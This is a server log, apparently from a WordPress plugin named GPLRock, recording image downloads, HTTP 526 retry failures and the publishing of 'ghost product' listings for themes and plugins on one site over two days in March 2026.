[11-Mar-2026 03:00:16 UTC] GPLRock: Image downloaded successfully for product ninja-forms-getresponse (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de10f74b.jpg [11-Mar-2026 03:00:17 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-getresponse: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-de10f74b.jpg [11-Mar-2026 03:00:17 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-getresponse [11-Mar-2026 03:00:17 UTC] GPLRock: Image downloaded successfully for product hamela-digital-agency-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95b12ba8.jpg [11-Mar-2026 03:00:17 UTC] GPLRock: Using pre-downloaded image for product hamela-digital-agency-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-95b12ba8.jpg [11-Mar-2026 03:00:17 UTC] GPLRock: Ghost product published with image - Product ID: hamela-digital-agency-services-elementor-template-kit [11-Mar-2026 03:00:18 UTC] GPLRock: Image downloaded successfully for product themify-builder-button-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c0fdd49.jpg [11-Mar-2026 03:00:18 UTC] GPLRock: Image downloaded successfully for product halse-architecture-interior-design-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2607acb0.webp [11-Mar-2026 03:00:18 UTC] GPLRock: Using pre-downloaded image for product themify-builder-button-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0c0fdd49.jpg [11-Mar-2026 03:00:18 UTC] GPLRock: Using pre-downloaded image for product halse-architecture-interior-design-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2607acb0.webp [11-Mar-2026 03:00:18 UTC] GPLRock: Ghost product published with image - Product ID: themify-builder-button-pro [11-Mar-2026 03:00:18 UTC] GPLRock: Ghost product published with image - Product ID: halse-architecture-interior-design-elementor-template-kit [11-Mar-2026 03:00:19 UTC] GPLRock: Image downloaded successfully for product gravityview-social-sharing-seo (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4bf09a8.jpg [11-Mar-2026 03:00:19 UTC] GPLRock: Image downloaded successfully for product haizea-creative-portfolio-resume-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1624b60f.webp [11-Mar-2026 03:00:19 UTC] GPLRock: Using pre-downloaded image for product haizea-creative-portfolio-resume-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1624b60f.webp [11-Mar-2026 03:00:19 UTC] GPLRock: Using pre-downloaded image for product gravityview-social-sharing-seo: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-f4bf09a8.jpg [11-Mar-2026 03:00:19 UTC] GPLRock: Ghost product published with image - Product ID: haizea-creative-portfolio-resume-elementor-template-kit [11-Mar-2026 03:00:19 UTC] GPLRock: Ghost product published with image - Product ID: gravityview-social-sharing-seo [11-Mar-2026 03:00:21 UTC] GPLRock: Image downloaded successfully for product hairsta-hair-salon-hairdresser-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-478c693e.jpg [11-Mar-2026 03:00:21 UTC] GPLRock: Image downloaded successfully for product mythemeshop-urban-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec74624a.jpg [11-Mar-2026 03:00:21 UTC] GPLRock: Using pre-downloaded image for product mythemeshop-urban-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ec74624a.jpg [11-Mar-2026 03:00:21 UTC] GPLRock: Using pre-downloaded image for product hairsta-hair-salon-hairdresser-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-478c693e.jpg [11-Mar-2026 03:00:21 UTC] GPLRock: Ghost product published with image - Product ID: hairsta-hair-salon-hairdresser-elementor-template-kit [11-Mar-2026 03:00:21 UTC] GPLRock: Ghost product published with image - Product ID: mythemeshop-urban-wordpress-theme [11-Mar-2026 03:00:22 UTC] GPLRock: Image downloaded successfully for product hade-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a2fb140.webp [11-Mar-2026 03:00:22 UTC] GPLRock: Image downloaded successfully for product super-forms-mailster (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98c12c77.jpg [11-Mar-2026 03:00:22 UTC] GPLRock: Using pre-downloaded image for product super-forms-mailster: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-98c12c77.jpg [11-Mar-2026 03:00:22 UTC] GPLRock: Using pre-downloaded image for product hade-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-0a2fb140.webp [11-Mar-2026 03:00:22 UTC] GPLRock: Ghost product published with image - Product ID: super-forms-mailster [11-Mar-2026 03:00:22 UTC] GPLRock: Ghost product published with image - Product ID: hade-business-elementor-template-kit [11-Mar-2026 03:00:23 UTC] GPLRock: Image downloaded successfully for product woocommerce-order-status-actions-manager (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1727aad9.jpg [11-Mar-2026 03:00:23 UTC] GPLRock: Image downloaded successfully for product gymsite-gym-fitness-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46542b3f.webp [11-Mar-2026 03:00:23 UTC] GPLRock: Using pre-downloaded image for product woocommerce-order-status-actions-manager: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1727aad9.jpg [11-Mar-2026 03:00:23 UTC] GPLRock: Using pre-downloaded image for product gymsite-gym-fitness-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-46542b3f.webp [11-Mar-2026 03:00:23 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-order-status-actions-manager [11-Mar-2026 03:00:23 UTC] GPLRock: Ghost product published with image - Product ID: gymsite-gym-fitness-elementor-template-kit [11-Mar-2026 03:00:24 UTC] GPLRock: Image downloaded successfully for product gympact-fitness-gym-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9bb462d2.webp [11-Mar-2026 03:00:25 UTC] GPLRock: Using pre-downloaded image for product gympact-fitness-gym-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9bb462d2.webp [11-Mar-2026 03:00:25 UTC] GPLRock: Ghost product published with image - Product ID: gympact-fitness-gym-elementor-template-kit [11-Mar-2026 03:00:25 UTC] GPLRock: Image downloaded successfully for product array-themes-fixed-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eacee26a.jpg [11-Mar-2026 03:00:25 UTC] GPLRock: Using pre-downloaded image for product array-themes-fixed-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-eacee26a.jpg [11-Mar-2026 03:00:25 UTC] GPLRock: Ghost product published with image - Product ID: array-themes-fixed-wordpress-theme [11-Mar-2026 03:00:26 UTC] GPLRock: Image downloaded successfully for product restrict-content-pro-aweber-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75cc7fe6.jpg [11-Mar-2026 03:00:26 UTC] GPLRock: Using pre-downloaded image for product restrict-content-pro-aweber-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75cc7fe6.jpg [11-Mar-2026 03:00:26 UTC] GPLRock: Ghost product published with image - Product ID: restrict-content-pro-aweber-pro [11-Mar-2026 03:00:27 UTC] GPLRock: Image downloaded successfully for product finax-responsive-business-consulting-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4818325.jpg [11-Mar-2026 03:00:28 UTC] GPLRock: Using pre-downloaded image for product finax-responsive-business-consulting-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-c4818325.jpg [11-Mar-2026 03:00:28 UTC] GPLRock: Ghost product published with image - Product ID: finax-responsive-business-consulting-wordpress-theme [12-Mar-2026 03:00:55 UTC] GPLRock: Image downloaded successfully for product hanoistore-supermarket-responsive-wooecommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-55541b45.webp [12-Mar-2026 03:00:55 UTC] GPLRock: Using pre-downloaded image for product hanoistore-supermarket-responsive-wooecommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-55541b45.webp [12-Mar-2026 03:00:55 UTC] GPLRock: Ghost product published with image - Product ID: hanoistore-supermarket-responsive-wooecommerce-wordpress-theme [12-Mar-2026 03:00:55 UTC] GPLRock: Image download failed for product crossway-startup-landing-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:00:57 UTC] GPLRock: Image download failed for product floating-call-button-all-in-one-call-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:00:57 UTC] GPLRock: Image download failed for product crossway-startup-landing-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:00:59 UTC] GPLRock: Image download failed for product floating-call-button-all-in-one-call-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:00:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crossway---startup-landing-page-template-18026.webp for product crossway-startup-landing-page-template after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:00 UTC] GPLRock: Image download failed for product crossway-startup-landing-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floating-call-button---all-in-one-call-button-1802.webp for product floating-call-button-all-in-one-call-button after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:01 UTC] GPLRock: Image download failed for product floating-call-button-all-in-one-call-button (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:02 UTC] GPLRock: Image download failed for product crossway-startup-landing-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:03 UTC] GPLRock: Image download failed for product floating-call-button-all-in-one-call-button (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/crossway---startup-landing-page-template-18026.webp for product crossway-startup-landing-page-template after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:04 UTC] GPLRock WARNING: Image download failed for product crossway-startup-landing-page-template. URL: https://meldwp.com/wp-content/uploads/crossway---startup-landing-page-template-18026.webp [12-Mar-2026 03:01:04 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: crossway-startup-landing-page-template [12-Mar-2026 03:01:04 UTC] GPLRock: Image download failed for product kimono-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/floating-call-button---all-in-one-call-button-1802.webp for product floating-call-button-all-in-one-call-button after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:05 UTC] GPLRock WARNING: Image download failed for product floating-call-button-all-in-one-call-button. URL: https://meldwp.com/wp-content/uploads/floating-call-button---all-in-one-call-button-1802.webp [12-Mar-2026 03:01:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: floating-call-button-all-in-one-call-button [12-Mar-2026 03:01:06 UTC] GPLRock: Image download failed for product custom-product-tabs-manager-plugin-product-tabs-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:06 UTC] GPLRock: Image download failed for product kimono-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:08 UTC] GPLRock: Image download failed for product custom-product-tabs-manager-plugin-product-tabs-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kimono---photography-portfolio-wordpress-theme-8878.webp for product kimono-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:08 UTC] GPLRock: Image download failed for product kimono-photography-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-product-tabs-manager-plugin---product-tabs-manager-15453.webp for product custom-product-tabs-manager-plugin-product-tabs-manager after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:10 UTC] GPLRock: Image download failed for product custom-product-tabs-manager-plugin-product-tabs-manager (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:10 UTC] GPLRock: Image download failed for product kimono-photography-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:12 UTC] GPLRock: Image download failed for product custom-product-tabs-manager-plugin-product-tabs-manager (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kimono---photography-portfolio-wordpress-theme-8878.webp for product kimono-photography-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:12 UTC] GPLRock WARNING: Image download failed for product kimono-photography-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kimono---photography-portfolio-wordpress-theme-8878.webp [12-Mar-2026 03:01:12 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kimono-photography-portfolio-wordpress-theme [12-Mar-2026 03:01:13 UTC] GPLRock: Image download failed for product digilab-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/custom-product-tabs-manager-plugin---product-tabs-manager-15453.webp for product custom-product-tabs-manager-plugin-product-tabs-manager after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:14 UTC] GPLRock WARNING: Image download failed for product custom-product-tabs-manager-plugin-product-tabs-manager. URL: https://meldwp.com/wp-content/uploads/custom-product-tabs-manager-plugin---product-tabs-manager-15453.webp [12-Mar-2026 03:01:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: custom-product-tabs-manager-plugin-product-tabs-manager [12-Mar-2026 03:01:15 UTC] GPLRock: Image download failed for product digilab-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:15 UTC] GPLRock: Image downloaded successfully for product timeliner-timeline-for-elementor (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b968b628.webp [12-Mar-2026 03:01:15 UTC] GPLRock: Using pre-downloaded image for product timeliner-timeline-for-elementor: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b968b628.webp [12-Mar-2026 03:01:15 UTC] GPLRock: Ghost product published with image - Product ID: timeliner-timeline-for-elementor [12-Mar-2026 03:01:15 UTC] GPLRock: Image download failed for product the-admin-post-statistics (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digilab---digital-marketing-agency-wordpress-theme-2794.webp for product digilab-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:17 UTC] GPLRock: Image download failed for product digilab-digital-marketing-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:17 UTC] GPLRock: Image download failed for product the-admin-post-statistics (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:19 UTC] GPLRock: Image download failed for product digilab-digital-marketing-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-admin-post-statistics-8588.webp for product the-admin-post-statistics after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:19 UTC] GPLRock: Image download failed for product the-admin-post-statistics (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/digilab---digital-marketing-agency-wordpress-theme-2794.webp for product digilab-digital-marketing-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:21 UTC] GPLRock WARNING: Image download failed for product digilab-digital-marketing-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/digilab---digital-marketing-agency-wordpress-theme-2794.webp [12-Mar-2026 03:01:21 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: digilab-digital-marketing-agency-wordpress-theme [12-Mar-2026 03:01:21 UTC] GPLRock: Image download failed for product farmhouse-agrotourism-farm-and-agriculture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:21 UTC] GPLRock: Image download failed for product the-admin-post-statistics (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:23 UTC] GPLRock: Image download failed for product farmhouse-agrotourism-farm-and-agriculture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/the-admin-post-statistics-8588.webp for product the-admin-post-statistics after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:24 UTC] GPLRock WARNING: Image download failed for product the-admin-post-statistics. URL: https://meldwp.com/wp-content/uploads/the-admin-post-statistics-8588.webp [12-Mar-2026 03:01:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: the-admin-post-statistics [12-Mar-2026 03:01:24 UTC] GPLRock: Image download failed for product wordpress-plugins-mega-bundle-by-bonfire (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/farmhouse---agrotourism-farm-and-agriculture-wordpress-theme-4806.webp for product farmhouse-agrotourism-farm-and-agriculture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:26 UTC] GPLRock: Image download failed for product farmhouse-agrotourism-farm-and-agriculture-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:26 UTC] GPLRock: Image download failed for product wordpress-plugins-mega-bundle-by-bonfire (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:28 UTC] GPLRock: Image download failed for product farmhouse-agrotourism-farm-and-agriculture-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-plugins-mega-bundle-by-bonfire-8850.webp for product wordpress-plugins-mega-bundle-by-bonfire after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:28 UTC] GPLRock: Image download failed for product wordpress-plugins-mega-bundle-by-bonfire (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/farmhouse---agrotourism-farm-and-agriculture-wordpress-theme-4806.webp for product farmhouse-agrotourism-farm-and-agriculture-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:30 UTC] GPLRock WARNING: Image download failed for product farmhouse-agrotourism-farm-and-agriculture-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/farmhouse---agrotourism-farm-and-agriculture-wordpress-theme-4806.webp [12-Mar-2026 03:01:30 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: farmhouse-agrotourism-farm-and-agriculture-wordpress-theme [12-Mar-2026 03:01:30 UTC] GPLRock: Image downloaded successfully for product academee-education-center-training-courses-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb15b791.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Using pre-downloaded image for product academee-education-center-training-courses-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-bb15b791.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Ghost product published with image - Product ID: academee-education-center-training-courses-wordpress-theme [12-Mar-2026 03:01:30 UTC] GPLRock: Image downloaded successfully for product amanus-boat-yacht-charter-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-653147fa.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Using pre-downloaded image for product amanus-boat-yacht-charter-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-653147fa.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Ghost product published with image - Product ID: amanus-boat-yacht-charter-wordpress-theme [12-Mar-2026 03:01:30 UTC] GPLRock: Image download failed for product wordpress-plugins-mega-bundle-by-bonfire (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:30 UTC] GPLRock: Image downloaded successfully for product lella-hairdresser-and-beauty-salon-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75f9560a.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Using pre-downloaded image for product lella-hairdresser-and-beauty-salon-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-75f9560a.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Ghost product published with image - Product ID: lella-hairdresser-and-beauty-salon-wordpress-theme [12-Mar-2026 03:01:30 UTC] GPLRock: Image downloaded successfully for product cide-elementor-high-tech-stores (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78ce61dd.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Using pre-downloaded image for product cide-elementor-high-tech-stores: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-78ce61dd.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Ghost product published with image - Product ID: cide-elementor-high-tech-stores [12-Mar-2026 03:01:30 UTC] GPLRock: Image downloaded successfully for product netmix-broadband-telecom-internet-provider-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d81307c8.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Using pre-downloaded image for product netmix-broadband-telecom-internet-provider-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-d81307c8.webp [12-Mar-2026 03:01:30 UTC] GPLRock: Ghost product published with image - Product ID: netmix-broadband-telecom-internet-provider-wordpress-theme [12-Mar-2026 03:01:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/wordpress-plugins-mega-bundle-by-bonfire-8850.webp for product wordpress-plugins-mega-bundle-by-bonfire after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:32 UTC] GPLRock WARNING: Image download failed for product wordpress-plugins-mega-bundle-by-bonfire. URL: https://meldwp.com/wp-content/uploads/wordpress-plugins-mega-bundle-by-bonfire-8850.webp [12-Mar-2026 03:01:32 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: wordpress-plugins-mega-bundle-by-bonfire [12-Mar-2026 03:01:32 UTC] GPLRock: Image downloaded successfully for product annotator-pro-image-tooltips-zooming (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e7acb90.webp [12-Mar-2026 03:01:32 UTC] GPLRock: Using pre-downloaded image for product annotator-pro-image-tooltips-zooming: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-3e7acb90.webp [12-Mar-2026 03:01:32 UTC] GPLRock: Ghost product published with image - Product ID: annotator-pro-image-tooltips-zooming [12-Mar-2026 03:01:32 UTC] GPLRock: Image download failed for product signature-field-for-elementor-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:34 UTC] GPLRock: Image download failed for product signature-field-for-elementor-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/signature-field-for-elementor-form-17782.webp for product signature-field-for-elementor-form after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:37 UTC] GPLRock: Image download failed for product signature-field-for-elementor-form (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:39 UTC] GPLRock: Image download failed for product signature-field-for-elementor-form (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/signature-field-for-elementor-form-17782.webp for product signature-field-for-elementor-form after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:41 UTC] GPLRock WARNING: Image download failed for product signature-field-for-elementor-form. URL: https://meldwp.com/wp-content/uploads/signature-field-for-elementor-form-17782.webp [12-Mar-2026 03:01:41 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: signature-field-for-elementor-form [12-Mar-2026 03:01:41 UTC] GPLRock: Image download failed for product content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:43 UTC] GPLRock: Image download failed for product content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/content-egg---all-in-one-plugin-for-affiliate-price-comparison-deal-sites-518.webp for product content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:45 UTC] GPLRock: Image download failed for product content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:47 UTC] GPLRock: Image download failed for product content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/content-egg---all-in-one-plugin-for-affiliate-price-comparison-deal-sites-518.webp for product content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:49 UTC] GPLRock WARNING: Image download failed for product content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites. URL: https://meldwp.com/wp-content/uploads/content-egg---all-in-one-plugin-for-affiliate-price-comparison-deal-sites-518.webp [12-Mar-2026 03:01:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: content-egg-all-in-one-plugin-for-affiliate-price-comparison-deal-sites [12-Mar-2026 03:01:50 UTC] GPLRock: Image download failed for product blockchain-explorer-cryptocurrency-nft (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:52 UTC] GPLRock: Image download failed for product blockchain-explorer-cryptocurrency-nft (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blockchain-explorer-cryptocurrency--nft-9228.webp for product blockchain-explorer-cryptocurrency-nft after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:54 UTC] GPLRock: Image download failed for product blockchain-explorer-cryptocurrency-nft (attempt 1/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:56 UTC] GPLRock: Image download failed for product blockchain-explorer-cryptocurrency-nft (attempt 2/3). HTTP Code: 526, Error: . Retrying... [12-Mar-2026 03:01:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/blockchain-explorer-cryptocurrency--nft-9228.webp for product blockchain-explorer-cryptocurrency-nft after 3 attempts. HTTP Code: 526, Error: [12-Mar-2026 03:01:58 UTC] GPLRock WARNING: Image download failed for product blockchain-explorer-cryptocurrency-nft. URL: https://meldwp.com/wp-content/uploads/blockchain-explorer-cryptocurrency--nft-9228.webp [12-Mar-2026 03:01:58 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: blockchain-explorer-cryptocurrency-nft [12-Mar-2026 03:01:58 UTC] 